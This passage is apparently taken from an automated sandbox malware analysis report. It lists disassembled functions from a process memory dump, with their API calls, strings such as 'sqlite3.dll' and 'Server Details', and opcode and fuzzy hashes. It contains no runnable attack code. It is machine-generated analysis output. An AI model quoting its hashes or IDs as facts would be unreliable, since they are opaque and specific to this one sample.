                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                      • String ID: menu_%d
                      • API String ID: 1129539653-2417748251
                      • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                      • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                      • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                      • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                      Function 004116E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      • failed memory resize %u to %u bytes, xrefs: 00411706
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _msizerealloc
                      • String ID: failed memory resize %u to %u bytes
                      • API String ID: 2713192863-2134078882
                      • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                      • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                      • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                      • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                      Function 004097FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                      • strrchr.MSVCRT ref: 00409808
                      • _mbscat.MSVCRT ref: 0040981D
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: FileModuleName_mbscatstrrchr
                      • String ID: _lng.ini
                      • API String ID: 3334749609-1948609170
                      • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                      • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                      • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                      • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                      Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                      Download Yara Rule
                      APIs
                      • _mbscpy.MSVCRT ref: 004070EB
                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                      • _mbscat.MSVCRT ref: 004070FA
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _mbscat$_mbscpystrlen
                      • String ID: sqlite3.dll
                      • API String ID: 1983510840-1155512374
                      • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                      • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                      • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                      • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                      Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                      Download Yara Rule
                      APIs
                      • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: PrivateProfileString
                      • String ID: A4@$Server Details
                      • API String ID: 1096422788-4071850762
                      • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                      • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                      • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                      • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                      Function 0042C821 Relevance: 5.2, APIs: 4, Instructions: 185COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$memset
                      • String ID:
                      • API String ID: 438689982-0
                      • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                      • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                      • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                      • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                      Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: FreeLocalmemcpymemsetstrlen
                      • String ID:
                      • API String ID: 3110682361-0
                      • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                      • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                      • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                      • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                      Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID:
                      • API String ID: 3510742995-0
                      • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                      • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                      • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                      • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8